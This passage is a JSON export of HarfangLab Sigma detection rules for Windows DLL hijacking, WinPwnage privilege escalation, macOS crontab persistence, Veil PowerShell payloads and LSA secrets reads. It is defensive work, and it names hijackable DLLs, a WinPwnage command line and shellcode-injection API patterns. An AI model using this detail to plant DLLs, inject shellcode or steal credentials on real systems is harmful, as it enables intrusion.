"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076531Z",
"creation_date": "2026-03-23T11:45:34.076533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076537Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cipher.yml",
"content": "title: DLL Hijacking via cipher.exe\nid: f69e4e20-02c1-4ae3-bd22-b8388e34350f\ndescription: |\n Detects potential Windows DLL Hijacking via cipher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cipher.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\iertutil.dll'\n - '\\NTDSAPI.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f69e4e20-02c1-4ae3-bd22-b8388e34350f",
"rule_name": "DLL Hijacking via cipher.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cipher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f6fce5da-b097-4cf5-8047-19389b3d1f01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609909Z",
"creation_date": "2026-03-23T11:45:34.609913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609921Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/functions/elevate/elevateMethod3.py",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_winpwnage_pipe_usage.yml",
"content": "title: Winpwnage Elevation Tool Detected\nid: f6fce5da-b097-4cf5-8047-19389b3d1f01\ndescription: |\n Detects a suspicious command-line related to the usage of the Winpwnage elevation tool.\n WinPwnage is a post-exploitation tool used for privilege escalation, bypassing User Account Control (UAC), and executing unauthorized actions on Windows systems by leveraging known vulnerabilities and misconfigurations.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/functions/elevate/elevateMethod3.py\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2021/02/08\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPwnage\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\\\.\\pipe\\WinPwnagePipe\n Image|endswith: '\\cmd.exe'\n CommandLine|contains|all:\n - '/c '\n - 'echo'\n - '\\\\\\\\.\\pipe\\WinPwnagePipe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f6fce5da-b097-4cf5-8047-19389b3d1f01",
"rule_name": "Winpwnage Elevation Tool Detected",
"rule_description": "Detects a suspicious command-line related to the usage of the Winpwnage elevation tool.\nWinPwnage is a post-exploitation tool used for privilege escalation, bypassing User Account Control (UAC), and executing unauthorized actions on Windows systems by leveraging known vulnerabilities and misconfigurations.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094489Z",
"creation_date": "2026-03-23T11:45:34.094491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_raserver.yml",
"content": "title: DLL Hijacking via raserver.exe\nid: f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6\ndescription: |\n Detects potential Windows DLL Hijacking via raserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'raserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f748cdc1-359b-4e61-a03c-1ab7bdbaa3f6",
"rule_name": "DLL Hijacking via raserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via raserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f78214a0-fe9f-4af4-92f4-2ec1a00aa950",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625899Z",
"creation_date": "2026-03-23T11:45:34.625901Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_suspicious_execution_macos.yml",
"content": "title: Suspicious Crontab Execution (macOS)\nid: f78214a0-fe9f-4af4-92f4-2ec1a00aa950\ndescription: |\n Detects the execution of the crontab command from outside a shell.\n An attacker could use crontab to add malicious cron jobs for persistence.\n Note that executions whose direct parent is one of the excluded shells (sh, bash, csh, dash, ksh, tcsh, zsh) are not covered by this rule.\n It is recommended to investigate the parent process of crontab as well as the potential creation of jobs to determine whether this action was legitimate.\nreferences:\n - https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/24\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n\n exclusion_crontab_exec_shell:\n ParentImage:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n\n exclusion_installsandbox:\n GrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/*/postinstall'\n\n exclusion_mcafee:\n GrandparentCommandLine:\n - 'sh /usr/local/McAfee/AntiMalware/AntiMalwareMertool /var/folders/*/MerToolLogs/McAfeeMERTool-Anti-malware'\n - '/bin/bash /usr/local/McAfee/MSCMertool -s /var/folders/*/MerToolLogs/McAfeeMERTool'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f78214a0-fe9f-4af4-92f4-2ec1a00aa950",
"rule_name": "Suspicious Crontab Execution (macOS)",
"rule_description": "Detects the execution of the crontab command from outside a shell.\nAn attacker could use crontab to add malicious cron jobs for persistence.\nNote that executions whose direct parent is one of the excluded shells (sh, bash, csh, dash, ksh, tcsh, zsh) are not covered by this rule.\nIt is recommended to investigate the parent process of crontab as well as the potential creation of jobs to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-24",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f792ad64-30bf-49b1-9878-bd8adfee568c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091474Z",
"creation_date": "2026-03-23T11:45:34.091476Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recover.yml",
"content": "title: DLL Hijacking via recover.exe\nid: f792ad64-30bf-49b1-9878-bd8adfee568c\ndescription: |\n Detects potential Windows DLL Hijacking via recover.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'recover.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f792ad64-30bf-49b1-9878-bd8adfee568c",
"rule_name": "DLL Hijacking via recover.exe",
"rule_description": "Detects potential Windows DLL Hijacking via recover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7936a91-3d4d-4606-92d9-32e1c5794d98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084994Z",
"creation_date": "2026-03-23T11:45:34.084996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Veil-Framework/Veil",
"https://www.tevora.com/threat-blog/dissecting-veil-evasion-powershell-payloads-and-converting-to-a-bind-shell/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_veil_framework.yml",
"content": "title: PowerShell Veil Metasploit Payload Detected\nid: f7936a91-3d4d-4606-92d9-32e1c5794d98\ndescription: |\n Detects the usage of the Veil tool.\n Veil is a tool designed to generate Metasploit payloads that can bypass common anti-virus solutions.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy. The PowerShell telemetry can also be used to analyze the PowerShell content.\nreferences:\n - https://github.com/Veil-Framework/Veil\n - https://www.tevora.com/threat-blog/dissecting-veil-evasion-powershell-payloads-and-converting-to-a-bind-shell/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/05/06\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Veil\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # meterpreter\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_http.py\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_https.py\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/meterpreter/rev_tcp.py\n selection_meterpreter:\n PowershellCommand|contains|all:\n - 'public static extern IntPtr VirtualAlloc('\n - 'public static extern IntPtr CreateThread('\n - '::VirtualAlloc(0,'\n - ',0x3000,0x40)'\n - '[System.Runtime.InteropServices.Marshal]::Copy('\n - '-namespace Win32Functions -passthru'\n - 'Start-Sleep -Second'\n\n # inline shellcode injection\n # https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/payloads/powershell/shellcode_inject/virtual.py\n selection_inject_method_virtual:\n PowershellCommand|contains|all:\n - 'public static extern 
IntPtr VirtualAlloc('\n - 'public static extern IntPtr CreateThread('\n - 'public static extern IntPtr memset('\n - 'public static extern bool VirtualProtect('\n - '-namespace Win32Functions -passthru'\n - '::VirtualProtect('\n - '[UInt32]0x1000, [UInt32]0x20,'\n - '::CreateThread(0,0,'\n - 'Start-Sleep -Second'\n selection_inject_method_heap:\n PowershellCommand|contains|all:\n - 'public static extern IntPtr HeapCreate('\n - 'public static extern IntPtr HeapAlloc('\n - 'public static extern IntPtr CreateThread('\n - 'public static extern IntPtr memset('\n - '-namespace Win32Functions -passthru'\n - '::HeapCreate(0x00040000,'\n - '::HeapAlloc('\n - ',0x00000008,'\n - '::memset([IntPtr]('\n - '::CreateThread(0,0,'\n - 'Start-Sleep -Second'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7936a91-3d4d-4606-92d9-32e1c5794d98",
"rule_name": "PowerShell Veil Metasploit Payload Detected",
"rule_description": "Detects the usage of the Veil tool.\nVeil is a tool designed to generate Metasploit payloads that can bypass common anti-virus solutions.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy. The PowerShell telemetry can also be used to analyze the PowerShell content.\n",
"rule_creation_date": "2022-05-06",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7b8ea5f-a36a-4bd3-8e58-764553af77cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081247Z",
"creation_date": "2026-03-23T11:45:34.081249Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/wastedlocker-technical-analysis/97944/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_proximityuxhost.yml",
"content": "title: DLL Hijacking via ProximityUxHost.exe\nid: f7b8ea5f-a36a-4bd3-8e58-764553af77cc\ndescription: |\n Detects potential Windows DLL Hijacking via ProximityUxHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/wastedlocker-technical-analysis/97944/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ProximityUxHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\dui70.dll'\n - '\\dwmapi.dll'\n - '\\opcservices.dll'\n - '\\propsys.dll'\n - '\\proximitycommon.dll'\n - '\\proximityservicepal.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: 
selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7b8ea5f-a36a-4bd3-8e58-764553af77cc",
"rule_name": "DLL Hijacking via ProximityUxHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ProximityUxHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f7eb64b2-21b0-493f-8043-540bcb5ff18c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074885Z",
"creation_date": "2026-03-23T11:45:34.074887Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074892Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://www.nirsoft.net/utils/lsa_secrets_dump.html",
"https://github.com/laxa/SharpSecretsdump/",
"https://attack.mitre.org/software/S0008/",
"https://attack.mitre.org/techniques/T1003"
],
"name": "t1003_004_lsa_secrets_read.yml",
"content": "title: LSA Secrets Read from Registry\nid: f7eb64b2-21b0-493f-8043-540bcb5ff18c\ndescription: |\n Detects sensitive values in relation to the Local Security Authority (LSA) being read.\n The LSA is a component of Microsoft Windows responsible for enforcing security policies, handling authentications, and managing process privileges.\n Due to its functions, the LSA contains a variety of different credential materials, making it a common target for attackers looking to lateralize or escalate their privileges.\n Since some LSA secrets are stored in the Windows registry, many security tools such as the Impacket suite, gsecdump or SharpSecretsdump implement components reading these values either locally or through Remote Registry Services to extract valuable information.\n This rule monitors the values associated with the current and backup secrets, such as the NL$KM key, used to encrypt cached credentials.\n It is recommended to determine if the process accessing these values has a legitimate reason to do so.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\n - 